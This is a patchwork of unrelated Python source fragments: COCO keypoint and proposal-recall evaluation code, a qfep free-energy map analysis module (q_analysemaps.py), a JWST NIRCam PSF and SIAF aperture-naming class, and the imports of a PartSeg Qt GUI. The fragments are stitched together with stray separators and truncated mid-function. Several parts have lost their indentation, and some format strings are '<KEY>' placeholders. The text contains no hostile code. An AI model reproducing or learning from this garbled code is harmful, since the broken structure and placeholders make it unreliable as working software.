            boxes.astype(dtype=np.float32, copy=False),
            gt_boxes.astype(dtype=np.float32, copy=False))
        # Greedy one-to-one matching: at each step pick the gt box with the
        # best remaining coverage, record it, and retire both the gt box
        # and its matching proposal.
        _gt_overlaps = np.zeros((gt_boxes.shape[0]))
        for j in range(min(boxes.shape[0], gt_boxes.shape[0])):
            # find which proposal box maximally covers each gt box
            argmax_overlaps = overlaps.argmax(axis=0)
            # and get the iou amount of coverage for each gt box
            max_overlaps = overlaps.max(axis=0)
            # find which gt box is 'best' covered (i.e. 'best' = most iou)
            gt_ind = max_overlaps.argmax()
            gt_ovr = max_overlaps.max()
            assert gt_ovr >= 0
            # find the proposal box that covers the best covered gt box
            box_ind = argmax_overlaps[gt_ind]
            # record the iou coverage of this gt box
            _gt_overlaps[j] = overlaps[box_ind, gt_ind]
            assert _gt_overlaps[j] == gt_ovr
            # mark the proposal box and the gt box as used
            overlaps[box_ind, :] = -1
            overlaps[:, gt_ind] = -1
        # append recorded iou coverage level
        gt_overlaps = np.hstack((gt_overlaps, _gt_overlaps))
    gt_overlaps = np.sort(gt_overlaps)
    if thresholds is None:
        step = 0.05
        thresholds = np.arange(0.5, 0.95 + 1e-5, step)
    recalls = np.zeros_like(thresholds)
    # compute recall for each iou threshold
    for i, t in enumerate(thresholds):
        recalls[i] = (gt_overlaps >= t).sum() / float(num_pos)
    # ar = 2 * np.trapz(recalls, thresholds)
    ar = recalls.mean()
    return {'ar': ar, 'recalls': recalls, 'thresholds': thresholds,
            'gt_overlaps': gt_overlaps, 'num_pos': num_pos}
def evaluate_keypoints(
    json_dataset,
    all_boxes,
    all_keypoints,
    output_dir,
    use_salt=True,
    cleanup=False
):
    """Dump keypoint detections to a COCO-format JSON file and, for
    non-test splits, score them with the COCO keypoint evaluator.

    Returns the COCOeval object, or None on test splits. When *cleanup*
    is set, the intermediate results file is deleted afterwards.
    """
    base = 'keypoints_' + json_dataset.name + '_results'
    if use_salt:
        # salt the filename so concurrent runs do not collide
        base += '_{}'.format(str(uuid.uuid4()))
    res_file = os.path.join(output_dir, base) + '.json'
    _write_coco_keypoint_results_file(
        json_dataset, all_boxes, all_keypoints, res_file)
    # Only do evaluation on non-test sets (annotations are undisclosed on test)
    coco_eval = None
    if json_dataset.name.find('test') == -1:
        coco_eval = _do_keypoint_eval(json_dataset, res_file, output_dir)
    # Optionally cleanup results json file
    if cleanup:
        os.remove(res_file)
    return coco_eval
def _write_coco_keypoint_results_file(
    json_dataset, all_boxes, all_keypoints, res_file
):
    """Serialize per-category keypoint results into one JSON file in the
    COCO keypoint results format."""
    results = []
    for cls_ind, cls in enumerate(json_dataset.classes):
        # stop once we run past the keypoint predictions actually provided
        if cls_ind >= len(all_keypoints):
            break
        if cls == '__background__':
            continue
        logger.info(
            'Collecting {} results ({:d}/{:d})'.format(
                cls, cls_ind, len(all_keypoints) - 1))
        cat_id = json_dataset.category_to_id_map[cls]
        per_cls = _coco_kp_results_one_category(
            json_dataset, all_boxes[cls_ind], all_keypoints[cls_ind], cat_id)
        results.extend(per_cls)
    logger.info(
        'Writing keypoint results json to: {}'.format(
            os.path.abspath(res_file)))
    with open(res_file, 'w') as fid:
        json.dump(results, fid)
def _coco_kp_results_one_category(json_dataset, boxes, kps, cat_id):
    """Convert one category's keypoint predictions into COCO results.

    The per-instance confidence is taken from the keypoint heatmap logit
    or probability row, or from the detection box score, depending on
    cfg.KRCNN.KEYPOINT_CONFIDENCE.

    :param json_dataset: dataset wrapper exposing ``COCO.getImgIds()``.
    :param boxes: per-image detection arrays, last column = score.
    :param kps: per-image lists of keypoint arrays aligned with boxes.
    :param cat_id: COCO category id to stamp on every result.
    :return: list of result dicts, one per detected instance.
    :raises ValueError: on an unrecognized KEYPOINT_CONFIDENCE setting.
    """
    results = []
    image_ids = json_dataset.COCO.getImgIds()
    image_ids.sort()
    assert len(kps) == len(image_ids)
    assert len(boxes) == len(image_ids)
    use_box_score = False
    if cfg.KRCNN.KEYPOINT_CONFIDENCE == 'logit':
        # This is ugly; see utils.keypoints.heatmap_to_keypoints for the magic
        # indexes
        score_index = 2
    elif cfg.KRCNN.KEYPOINT_CONFIDENCE == 'prob':
        score_index = 3
    elif cfg.KRCNN.KEYPOINT_CONFIDENCE == 'bbox':
        use_box_score = True
    else:
        raise ValueError(
            'KRCNN.KEYPOINT_CONFIDENCE must be "logit", "prob", or "bbox"')
    for i, image_id in enumerate(image_ids):
        if len(boxes[i]) == 0:
            continue
        kps_dets = kps[i]
        # Fix: np.float was a deprecated alias of builtin float and was
        # removed in NumPy 1.24; astype(float) is the exact equivalent.
        scores = boxes[i][:, -1].astype(float)
        if len(kps_dets) == 0:
            continue
        for j in range(len(kps_dets)):
            # flatten keypoints to COCO's [x1, y1, v1, x2, y2, v2, ...]
            # layout, with visibility fixed to 1
            xy = []
            kps_score = 0
            for k in range(kps_dets[j].shape[1]):
                xy.append(float(kps_dets[j][0, k]))
                xy.append(float(kps_dets[j][1, k]))
                xy.append(1)
                if not use_box_score:
                    kps_score += kps_dets[j][score_index, k]
            if use_box_score:
                kps_score = scores[j]
            else:
                # average the per-keypoint confidences
                kps_score /= kps_dets[j].shape[1]
            results.extend([{'image_id': image_id,
                             'category_id': cat_id,
                             'keypoints': xy,
                             'score': kps_score}])
    return results
def _do_keypoint_eval(json_dataset, res_file, output_dir):
ann_type = 'keypoints'
imgIds | |
<filename>cadee/qscripts/q_analysemaps.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2016 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
#
# This script can act as a standalone program with no arguments,
# or it can be imported to use the QAnalyseMaps object
# (first argument is a list of directories which contain the qfep output file; optional argument is the name of the output file)
# and its functions like get_dGa_mean(), get_dG0_mean(), get_summary(), get_failed(), get_analysed() and so on...
#
# .get_analysed() returns a list of QAnalyseMap objects, which have functions to retrieve useful info like:
#
## - Reaction free energy profile normalized vs the reactants state - dG vs (E2-E1) ( get_dG_dE() )
## - Activation and reaction free energies ( get_dGa(), get_dG0() )
## - Free Energy Perturbation results - dG vs lambda ( get_dG_lambda() )
## - Average energies (Qbond,Qangle...) in each step vs frame ( get_E_lambda() )
## - dE(state1), dE(state2), LRA and REORG energies (Qbond,Qangle,...) ( get_dE1(), get_dE2(), get_lra(), get_reorg() )
import os
import subprocess
import tempfile
import re
from qscripts_config import QScriptsConfig as QScfg
from lib.common import DataContainer, np, backup_file, __version__
class QAnalyseMapError(Exception):
    """Error raised while parsing or analysing qfep mapping output."""
class QAnalyseMaps():
    """Analyse qfep mapping output from one or more mapped directories.

    Every directory is expected to contain a qfep output file. All files
    are parsed; replicas that yield activation (dG#) and reaction (dG0)
    free energies end up in ``self._analysed``, the rest in
    ``self._failed``. Statistics (mean/stdev/median), averaged group
    contributions, averaged LRA energies and a formatted text summary
    are exposed through the getters below.

    FIX: replaced Python-2-only ``dict.iteritems()`` / ``dict.has_key()``
    and non-indexable ``zip()`` usage with forms that work on both
    Python 2 and 3 without changing behaviour.
    """

    def __init__(self, mapped_directories, qfep_out=QScfg.get("files","qfep_out"), _qanalysemaplist=None):
        """Parse and analyse qfep outputs in ``mapped_directories``.

        :param mapped_directories: directory or list of directories
        :param qfep_out: qfep output filename inside each directory
        :param _qanalysemaplist: internal - pre-built _QAnalyseMap list
                                 (used when recursing for exclusions)
        """
        # failed are those that fail to give dGa and dG0 values
        self._analysed = []    # _QAnalyseMap instances
        self._failed = []      # ( path, errorstring ) tuples
        self._exclusions = {}  # { "full_88_177": QAnalyseMaps_instance, ... }
        self._dgas = []
        self._dg0s = []
        if not isinstance(mapped_directories, list):
            mapped_directories = [mapped_directories, ]
        self._mapped_directories = mapped_directories
        # analyse the maps
        # if _qanalysemaplist is not passed in create new _QAnalyseMap objects
        if not _qanalysemaplist:
            qanlist = []
            for md in mapped_directories:
                mfile = os.path.join(md, qfep_out)
                qanlist.append(_QAnalyseMap(mfile))
        else:
            qanlist = _qanalysemaplist
        # parse and analyse the maps
        for qan in qanlist:
            try:
                qan._parse()
                dga, dg0 = qan.get_dGa(), qan.get_dG0()
                self._analysed.append(qan)
                self._dgas.append(dga)
                self._dg0s.append(dg0)
            except Exception as e:  # catch everything
                # raise   # enable this for debug
                self._failed.append((qan.get_dirname(), e))
        # If _qanalysemaplist was not passed in (the object was called from
        # outside), iterate through the analysed objects and check for
        # exclusions. If they exist, create new QAnalyseMaps objects from
        # them, and add to self._exclusions dictionary
        if not _qanalysemaplist:
            exclusions = {}
            for qan in self._analysed:
                # .items() instead of py2-only .iteritems()
                for name, excl in qan._get_exclusions().items():
                    if name not in exclusions:
                        exclusions[name] = []
                    exclusions[name].append(excl)
            for name, qans in exclusions.items():
                self._exclusions[name] = QAnalyseMaps(self._mapped_directories, _qanalysemaplist=qans)

    def get_exclusions(self):
        """Return { exclusion_name: QAnalyseMaps } for detected exclusions."""
        return self._exclusions

    def get_dGa_mean(self):
        """Mean activation free energy over analysed replicas."""
        return np.mean(self._dgas)

    def get_dG0_mean(self):
        """Mean reaction free energy over analysed replicas."""
        return np.mean(self._dg0s)

    def get_analysed(self):
        """List of successfully analysed _QAnalyseMap objects."""
        return self._analysed  # populated in __init__

    def get_failed(self):
        """List of (path, error) tuples for replicas that failed."""
        return self._failed  # populated in __init__

    def get_dGa_stdev(self):
        """Sample standard deviation (ddof=1) of dG#."""
        return np.std(self._dgas, ddof=1)

    def get_dG0_stdev(self):
        """Sample standard deviation (ddof=1) of dG0."""
        return np.std(self._dg0s, ddof=1)

    def get_dGa_median(self):
        """Median of dG#."""
        return np.median(self._dgas)

    def get_dG0_median(self):
        """Median of dG0."""
        return np.median(self._dg0s)

    def get_extrema_lambdas(self):
        """Return (min1, max, min2) lambdas most frequent among replicas."""
        # get the lambdas that are most frequent in the replicas
        min1_ls, min2_ls, max_ls = {}, {}, {}
        for an in self.get_analysed():
            a, b, c = an.get_extrema_lambdas()
            min1_ls[a] = min1_ls.get(a, 0) + 1
            max_ls[b] = max_ls.get(b, 0) + 1
            min2_ls[c] = min2_ls.get(c, 0) + 1
        min1_l = max(min1_ls, key=lambda x: min1_ls[x])
        max_l = max(max_ls, key=lambda x: max_ls[x])
        min2_l = max(min2_ls, key=lambda x: min2_ls[x])
        return (min1_l, max_l, min2_l)

    def get_average_GCs(self, lambda1, lambda2, first_res=1, last_res=None, cached=False, solvent=False, qmaskfile=None):
        """Return a DataContainer with mean/stdev group contributions
        (VdW and El) per residue, averaged over all analysed replicas."""
        # returns averages and stds for the group contributions
        average_GCs = DataContainer(["Residue id", "VdW(%5.4f-%5.4f)_mean" % (lambda2, lambda1),
                                     "VdW(%5.4f-%5.4f)_stdev" % (lambda2, lambda1),
                                     "El(%5.4f-%5.4f)_mean" % (lambda2, lambda1),
                                     "El(%5.4f-%5.4f)_stdev" % (lambda2, lambda1)])
        average_GCs.comment = "Group contribution statistics at lambdas: %s, %s" % (lambda1, lambda2)
        gcs = {}
        for an in self.get_analysed():
            gc = an.get_group_contributions(lambda1, lambda2, first_res=first_res, last_res=last_res, cached=cached, solvent=solvent, qmaskfile=qmaskfile)
            for rc in gc.get_rows():
                resid = rc[0]
                values = [[val, ] for val in rc[1:]]
                # membership test instead of py2-only dict.has_key()
                if resid not in gcs:
                    gcs[resid] = values
                else:
                    for i, val in enumerate(gcs[resid]):
                        val.extend(values[i])
        # iterate through each residue
        for resid in sorted(gcs.keys()):
            rc = gcs[resid]
            # get mean and stdev
            rc_stats = [resid,
                        np.mean(rc[0]), np.std(rc[0]),  # vdw
                        np.mean(rc[1]), np.std(rc[1])]  # el
            average_GCs.add_row(rc_stats)
        average_GCs.comment += "\n# "
        return average_GCs

    def get_average_LRAs(self, lambda1, lambda2):
        """Return a DataContainer with mean/std LRA energies over replicas
        (returns None when no replica was analysed)."""
        # returns averages and stds for LRAs
        an_maps = self.get_analysed()
        if len(an_maps) != 0:
            average_lras = DataContainer(["E_type", "(E2-E1)_10_mean", "(E2-E1)_10_std", "(E2-E1)_01_mean", "(E2-E1)_01_std", "LRA_mean", "LRA_std", "REORG_mean", "REORG_std"])
            average_lras.comment = " LRA statistics"
            allvals = []
            for an in an_maps:
                lra = an.get_lra(lambda1, lambda2)
                rows = lra.get_rows()
                for irow, row in enumerate(rows):
                    try:
                        allvals[irow].append(row)
                    except IndexError:
                        allvals.append([row, ])
            # allvals now looks like this:
            # [
            #   [
            #     ["EQtot", EQtot_de_st1_1, EQtot_de_st2_1, EQtot_lra_1, EQtot_reorg_1],
            #     ["EQtot", EQtot_de_st1_2, EQtot_de_st2_2, ...], ...
            #   ],
            #   [
            #     ["EQbond", EQbond_de_st1_1, EQbond_de_st2_1, EQbond_lra_1, EQbond_reorg_1],
            #     ["EQbond", EQbond_de_st1_2, EQbond_de_st2_2, ...], ...
            #   ]
            # ]
            #
            for values in allvals:
                # transpose to get [ ["EQtot","EQtot"...], [ EQtot_de_st1_1, EQtot_de_st1_2,...], [EQtot_de_st2_1,EQtot_de_st2_2,...], ...]
                # list() so the transposed rows are indexable on Python 3,
                # where zip() returns an iterator
                values = list(zip(*values))
                # now they can be easily averaged and std-ed
                e_type = values[0][0]
                de_st1_mean = np.mean(values[1])
                de_st2_mean = np.mean(values[2])
                lra_mean = np.mean(values[3])
                reo_mean = np.mean(values[4])
                de_st1_std = np.std(values[1])
                de_st2_std = np.std(values[2])
                lra_std = np.std(values[3])
                reo_std = np.std(values[4])
                average_lras.add_row([e_type, de_st1_mean, de_st1_std, de_st2_mean, de_st2_std, lra_mean, lra_std, reo_mean, reo_std])
            return average_lras

    def get_summary(self):
        """Return a formatted text summary over all replicas.

        Includes per-replica dG#/dG0 and extrema lambdas, overall
        mean/stdev/median statistics, and the failed/warning lists.
        """
        # This function calculates means, deviations, medians (of dGa and dG0),
        # it looks for dGa outliers (>3s) and removes them
        # It returns a string containing all results in a neat format.
        allres = {}
        allres["n"] = len(self._dgas)
        allres["dga"] = (self.get_dGa_mean(), self.get_dGa_stdev(), self.get_dGa_median())
        allres["dg0"] = (self.get_dG0_mean(), self.get_dG0_stdev(), self.get_dG0_median())
        qams = []
        warns = []
        for qam in self._analysed:
            rp = os.path.relpath(qam.get_dirname()) + os.path.sep
            min1, ts, min2 = qam.get_extrema_lambdas()
            qams.append("%-40s %8.2f %8.2f %8.4f %8.4f %8.4f" % (rp, qam.get_dGa(), qam.get_dG0(), min1, ts, min2))
            w = qam.get_warnings()
            if w:
                warns.append("%s:\n-- %s" % (rp, "\n-- ".join(w)))
        if warns:
            allres["warnings"] = "WARNINGS: %d\n%s" % (len(warns), "\n".join(warns))
        else:
            allres["warnings"] = "Warnings: None"
        allres["analysed"] = "\n".join(sorted(qams))
        if self._failed:
            errors = "\n".join(["%s -> %s " % (n, e) for n, e in self._failed])
            allres["fails"] = "FAILED: %d\n%s" % (len(self._failed), errors)
        else:
            allres["fails"] = "Failed to analyse: None"
        return """
---------------------------- QAnalyseMaps SUMMARY ----------------------------
Analysed with version: {version}
DIRNAMES dG# dG0 RS_l TS_l PS_l
{analysed}
Assuming normal distribution...
N={n} Mean St.dev Median
dG# {dga[0]:10.2f} {dga[1]:10.2f} {dga[2]:10.2f}
dG0 {dg0[0]:10.2f} {dg0[1]:10.2f} {dg0[2]:10.2f}
{fails}
{warnings}
------------------------------------------------------------------------------
""".format(version=__version__, **allres)
class _QAnalyseMap():
def __init__(self, mappinglogfile, _logfilestring=None):
self._mappinglogfile = mappinglogfile
self._dirname = os.path.dirname(os.path.abspath(mappinglogfile))
self._warnings = []
self._exclusions = {} # { "full_386" : _QAanalyseMap_instance, ... }
# compiled REs
self._PART0_RE = re.compile("(# Part 0.*?)# Part 1", re.DOTALL)
self._PART1_RE = re.compile("(# Part 1.*?)# Part 2", re.DOTALL)
self._PART2_RE = re.compile("(# Part 2.*?)# Part 3", re.DOTALL)
self._PART3_RE = re.compile("(# Part 3.*?)# Part 1", re.DOTALL) # '# Part 1' is added manually to the end of the logfile
self._EXCL_RE = re.compile("Calculation for system with (\w+) exclusion, residues (.*?\n)", re.DOTALL)
# constants
self._PART0_HEADER = "# file state pts lambda EQtot EQbond EQang EQtor EQimp EQel EQvdW Eel_qq EvdW_qq Eel_qp EvdW_qp Eel_qw EvdW_qw Eqrstr"
self._PART1_HEADER = "# lambda(1) dGf sum(dGf) dGr sum(dGr) <dG>"
self._PART2_HEADER = "# Lambda(1) bin Energy gap dGa dGb dGg # pts c1**2 c2**2"
self._PART3_HEADER = "# bin energy gap <dGg> <dGg | |
the type of observation.
Odd number place the PSF on the center of the pixel,
whereas an even number centers it on the "crosshairs."
oversample : int
Factor to oversample during WebbPSF calculations.
Default 2 for coronagraphy and 4 otherwise.
include_si_wfe : bool
Include SI WFE measurements? Default=True.
include_distortions : bool
If True, will include a distorted version of the PSF.
pupil : str
File name or HDUList specifying telescope entrance pupil.
Can also be an OTE_Linear_Model.
pupilopd : tuple or HDUList
Tuple (file, index) or filename or HDUList specifying OPD.
Can also be an OTE_Linear_Model.
wfe_drift : float
Wavefront error drift amplitude in nm.
offset_r : float
Radial offset from the center in arcsec.
offset_theta :float
Position angle for radial offset, in degrees CCW.
bar_offset : float
For wedge masks, option to set the PSF position across the bar.
jitter : str or None
Currently either 'gaussian' or None.
jitter_sigma : float
If ``jitter = 'gaussian'``, then this is the size of the blurring effect.
npsf : int
Number of wavelengths/PSFs to fit.
ndeg : int
Degree of polynomial fit.
nproc : int
Manual setting of number of processor cores to break up PSF calculation.
If set to None, this is determined based on the requested PSF size,
number of available memory, and hardware processor cores. The automatic
calculation endeavors to leave a number of resources available to the
user so as to not crash the user's machine.
save : bool
Save the resulting PSF coefficients to a file? (default: True)
force : bool
Forces a recalcuation of PSF even if saved PSF exists. (default: False)
quick : bool
Only perform a fit over the filter bandpass with a lower default polynomial degree fit.
(default: True)
use_legendre : bool
Fit with Legendre polynomials, an orthonormal basis set. (default: True)
"""
update_coeffs = False
update_bg_coeffs = False
# filter, pupil mask, and image mask
if (filter is not None) and (filter != self.filter):
update_coeffs = True
update_bg_coeffs = True
self.filter = filter
if (pupil_mask is not None) and (pupil_mask != self.pupil_mask):
update_coeffs = True
update_bg_coeffs = True
if (pupil_mask.upper()=="CLEAR") or (pupil_mask.upper()=="NONE"):
pupil_mask = None
self.pupil_mask = pupil_mask
if (image_mask is not None) and (image_mask != self.image_mask):
update_coeffs = True
update_bg_coeffs = True
if (image_mask.upper()=="CLEAR") or (image_mask.upper()=="NONE"):
image_mask = None
self.image_mask = image_mask
if (fov_pix is not None) and (fov_pix != self.fov_pix):
update_coeffs = True
self.fov_pix = fov_pix
if (oversample is not None) and (oversample != self.oversample):
update_coeffs = True
self.oversample = oversample
# SI WFE and distortions
if (include_si_wfe is not None) and (include_distortions != self.include_distortions):
update_coeffs = True
self.include_si_wfe = include_si_wfe
if (include_distortions is not None) and (include_distortions != self.include_distortions):
update_coeffs = True
self.include_distortions = include_distortions
# Pupil OPD information
if (pupil is not None) and (self.pupil != pupil):
update_coeffs = True
self.pupil = pupil
if (pupilopd is not None) and (self.pupilopd != pupilopd):
update_coeffs = True
self.pupilopd = pupilopd
# Source and mask offsetting
if (offset_r is not None) and (self.options.get('source_offset_r') != offset_r):
update_coeffs = True
self.options['source_offset_r'] = offset_r
if (offset_theta is not None) and (self.options.get('source_offset_theta') != offset_theta):
update_coeffs = True
self.options['source_offset_theta'] = offset_theta
if (bar_offset is not None) and (self.options.get('bar_offset') != bar_offset):
update_coeffs = True
self.options['bar_offset'] = bar_offset
# Jitter
if (jitter is not None) and (self.options.get('jitter') != jitter):
update_coeffs = True
self.options['jitter'] = jitter
if (jitter_sigma is not None) and (self.options.get('jitter_sigma') != jitter_sigma):
update_coeffs = True
self.options['jitter_sigma'] = jitter_sigma
# Misecellaneous
if (npsf is not None) and (self.npsf != npsf):
update_coeffs = True
self.npsf = npsf
if (ndeg is not None) and (self.ndeg != ndeg):
update_coeffs = True
self.ndeg = ndeg
if (quick is not None) and (self.quick != quick):
update_coeffs = True
self.quick = quick
if (use_legendre is not None) and (self.use_legendre != use_legendre):
update_coeffs = True
self.use_legendre = use_legendre
# Detector update
if detector is not None:
update_coeffs = True
self.detector = get_detname(detector)
self.update_detectors()
# Regenerate PSF coefficients
if update_coeffs:
del self.psf_coeff, self.psf_coeff_header
save = True if save is None else save
self.gen_psf_coeff(save=save, force=force, nproc=nproc, **kwargs)
# Update drift, field, and mask-dependent coefficients
if self._psf_coeff_mod['wfe_drift'] is not None:
self.gen_wfedrift_coeff()
if self._psf_coeff_mod['si_field'] is not None:
self.gen_wfefield_coeff()
if self._psf_coeff_mod['si_mask'] is not None:
self.gen_wfemask_coeff()
# Update bg class if filter or pupil mask is changed
if update_bg_coeffs:
self._update_bg_class()
@property
def psf_info(self):
"""PSF parameters"""
d_options = self.options
d = {
'fov_pix': self.fov_pix, 'oversample': self.oversample,
'npsf': self.npsf, 'ndeg': self.ndeg, 'include_si_wfe': self.include_si_wfe,
'include_distortions': self.include_distortions,
'jitter': d_options.get('jitter'), 'jitter_sigma': d_options.get('jitter_sigma'),
'offset_r': d_options.get('source_offset_r', 0), 'offset_theta': d_options.get('source_offset_theta', 0),
'bar_offset': d_options.get('bar_offset', None),
'pupil': self.pupil, 'pupilopd': self.pupilopd,
}
return d
@property
def multiaccum(self):
""":class:`multiaccum` object"""
return self.Detector.multiaccum
@property
def multiaccum_times(self):
"""Exposure timings in dictionary
t_frame : Time of a single frame.
t_group : Time of a single group (read frames + drop frames).
t_int : Photon collection time for a single ramp/integration.
t_int_tot1: Total time for all frames (reset+read+drop) in a first ramp.
t_int_tot2: Total time for all frames (reset+read+drop) in a subsequent ramp.
t_exp : Total photon collection time for all ramps.
t_acq : Total acquisition time to complete exposure with all overheads.
"""
return self.Detector.times_to_dict()
@property
def det_info(self):
"""Dictionary housing detector info parameters and keywords."""
return self._det_info
@property
def well_level(self):
"""Detector well level in units of electrons"""
return self.Detector.well_level
@property
def siaf_ap_names(self):
"""Give all possible SIAF aperture names"""
return list(self.siaf.apernames)
    def get_siaf_apname(self):
        """Get SIAF aperture based on instrument settings.

        Builds a candidate aperture-name key from the detector, window
        mode, coronagraph/grism configuration and filter, then validates
        it against ``self.siaf_ap_names``. Returns the key string when it
        is a known aperture, otherwise logs a warning and returns None.
        """
        # Return already defined ap name
        # if (self.siaf_ap is not None) and (not override):
        #     return self.siaf_ap.AperName
        # else:
        detid = self.Detector.detid
        wind_mode = self.Detector.wind_mode
        is_lyot = self.is_lyot
        is_coron = self.is_coron
        is_grism = self.is_grism
        pupil_mask = self.pupil_mask
        # Normalize the channel naming to the SW/LW shorthand used below
        if self.channel=='long' or self.channel=='LW':
            channel = 'LW'
        else:
            channel = 'SW'
        # Time series filters
        ts_filters = ['F277W','F356W','F444W','F322W2']
        # Coronagraphic bar filters
        swb_filters = ['F182M','F187N','F210M','F212N','F200W']
        lwb_filters = [
            'F250M','F300M','F277W','F335M','F360M',
            'F356W','F410M','F430M','F460M','F480M','F444W'
        ]
        # Coronagraphy
        if is_coron:
            wstr = 'FULL_' if wind_mode=='FULL' else ''
            # NOTE(review): '<KEY>' looks like a redacted/placeholder format
            # template (three arguments are supplied); confirm the intended
            # literal (presumably 'NRC{}_{}{}') against upstream history.
            key = '<KEY>'.format(detid,wstr,self.image_mask)
            # Module-A wedge (bar) masks get a filter-specific aperture
            if ('WB' in self.image_mask) and (self.module=='A') and (self.filter in swb_filters+lwb_filters):
                key = key + '_{}'.format(self.filter)
            # No coronagraphic aperture defined for stripe windowing
            if wind_mode=='STRIPE':
                key = None
        # Just Lyot stop without masks, assuming TA aperture
        elif is_lyot: #and self.ND_acq:
            tastr = 'TA' if self.ND_acq else 'FSTA'
            key = 'NRC{}_{}'.format(detid,tastr)
            # Append the occulting-mask suffix matching pupil/channel/filter
            if ('CIRC' in pupil_mask) and ('SW' in channel):
                key = key + 'MASK210R'
            elif ('CIRC' in pupil_mask) and ('LW' in channel):
                key = key + 'MASK430R' if ('F4' in self.filter) else key + 'MASK335R'
            elif ('WEDGE' in pupil_mask) and ('SW' in channel):
                key = key + 'MASKSWB'
            elif ('WEDGE' in pupil_mask) and ('LW' in channel):
                key = key + 'MASKLWB'
        # Time series grisms
        elif is_grism and ('GRISMR' in pupil_mask) and (self.filter in ts_filters):
            if wind_mode=='FULL':
                key = f'NRC{detid}_GRISM_{self.filter}'
            elif wind_mode=='STRIPE':
                key = 'NRC{}_GRISM{}_{}'.format(detid,self.det_info['ypix'],self.filter)
            else:
                key = None
        # SW Time Series with LW grism
        elif wind_mode=='STRIPE':
            key = 'NRC{}_GRISMTS{:.0f}'.format(detid,self.det_info['ypix'])
        # WFSS
        elif is_grism and (wind_mode=='FULL'):
            # NOTE(review): '<KEY>' placeholder again — likely 'NRC{}_{}'
            # (detector + grism pupil); confirm before relying on this path.
            key = '<KEY>'.format(detid, pupil_mask)
        # Subarrays
        elif wind_mode=='WINDOW':
            # Try progressively less common subarray aperture conventions
            key = 'NRC{}_SUB{}P'.format(detid,self.det_info['xpix'])
            if key not in self.siaf_ap_names:
                key = 'NRC{}_TAPSIMG{}'.format(detid,self.det_info['xpix'])
            if key not in self.siaf_ap_names:
                key = 'NRC{}_TAGRISMTS{}'.format(detid,self.det_info['xpix'])
            if key not in self.siaf_ap_names:
                key = 'NRC{}_TAGRISMTS_SCI_{}'.format(detid,self.filter)
            if key not in self.siaf_ap_names:
                key = 'NRC{}_SUB{}'.format(detid,self.det_info['xpix'])
        # Full frame generic
        elif wind_mode=='FULL':
            key = 'NRC{}_FULL'.format(detid)
        else:
            key = None
        # Check if key exists
        if key in self.siaf_ap_names:
            _log.info('Suggested SIAF aperture name: {}'.format(key))
            return key
        else:
            _log.warning("Suggested SIAF aperture name '{}' is not defined".format(key))
            return None
def get_subarray_name(self, apname=None):
"""Get JWST NIRCam subarray name"""
if apname is None:
apname = self.get_siaf_apname()
pupil_mask = self.pupil_mask
image_mask = self.image_mask
module = self.module
detid = self.Detector.detid
wind_mode = self.Detector.wind_mode
ypix = self.det_info['ypix']
is_lyot = self.is_lyot
is_coron = self.is_coron
is_grism = self.is_grism
is_ndacq = self.ND_acq
if 'FULL' in wind_mode:
subarray_name = 'FULLP' if apname[-1] == 'P' else 'FULL'
elif 'STRIPE' in wind_mode:
subarray_name = f'SUBGRISM{ypix}'
elif is_coron:
sub_str = f'SUB{ypix}'
mask_str = image_mask[4:]
if ('335R' in image_mask) and (module == 'A'):
subarray_name = sub_str | |
import os
import sys
from pathlib import Path
from typing import Type
import numpy as np
from qtpy.QtCore import QByteArray, QEvent, Qt
from qtpy.QtGui import QIcon, QKeyEvent, QKeySequence, QResizeEvent
from qtpy.QtWidgets import (
QCheckBox,
QComboBox,
QGridLayout,
QHBoxLayout,
QInputDialog,
QLabel,
QMessageBox,
QPushButton,
QVBoxLayout,
QWidget,
)
import PartSegData
from PartSeg.common_gui.custom_load_dialog import CustomLoadDialog
from PartSeg.common_gui.main_window import BaseMainMenu, BaseMainWindow
from PartSeg.common_gui.stacked_widget_with_selector import StackedWidgetWithSelector
from PartSeg.segmentation_analysis.measurement_widget import MeasurementWidget
from PartSegCore import state_store
from PartSegCore.algorithm_describe_base import SegmentationProfile
from PartSegCore.analysis import ProjectTuple, algorithm_description, load_functions
from PartSegCore.analysis.analysis_utils import SegmentationPipeline, SegmentationPipelineElement
from PartSegCore.analysis.io_utils import create_history_element_from_project
from PartSegCore.analysis.save_functions import save_dict
from PartSegCore.io_utils import HistoryElement, WrongFileTypeException
from PartSegCore.mask_create import calculate_mask_from_project
from PartSegCore.segmentation.algorithm_base import SegmentationResult
from PartSegCore.segmentation_info import SegmentationInfo
from PartSegImage import TiffImageReader
from ..common_gui.algorithms_description import AlgorithmChoose, InteractiveAlgorithmSettingsWidget
from ..common_gui.channel_control import ChannelProperty
from ..common_gui.custom_save_dialog import SaveDialog
from ..common_gui.equal_column_layout import EqualColumnLayout
from ..common_gui.mask_widget import MaskDialogBase
from ..common_gui.multiple_file_widget import MultipleFileWidget
from ..common_gui.stack_image_view import ColorBar
from ..common_gui.universal_gui_part import TextShow
from ..common_gui.waiting_dialog import ExecuteFunctionDialog, WaitingDialog
from .advanced_window import SegAdvancedWindow
from .batch_window import BatchWindow
from .calculation_pipeline_thread import CalculatePipelineThread
from .image_view import CompareImageView, ResultImageView, SynchronizeView
from .partseg_settings import PartSettings
# Directory where the analysis GUI persists its state/settings
# (subfolder of the application-wide save folder).
CONFIG_FOLDER = os.path.join(state_store.save_folder, "analysis")
class Options(QWidget):
def __init__(
self,
settings: PartSettings,
channel_control2: ChannelProperty,
left_image: ResultImageView,
main_image: ResultImageView,
synchronize: SynchronizeView,
):
super().__init__()
self._settings = settings
self.left_panel = left_image
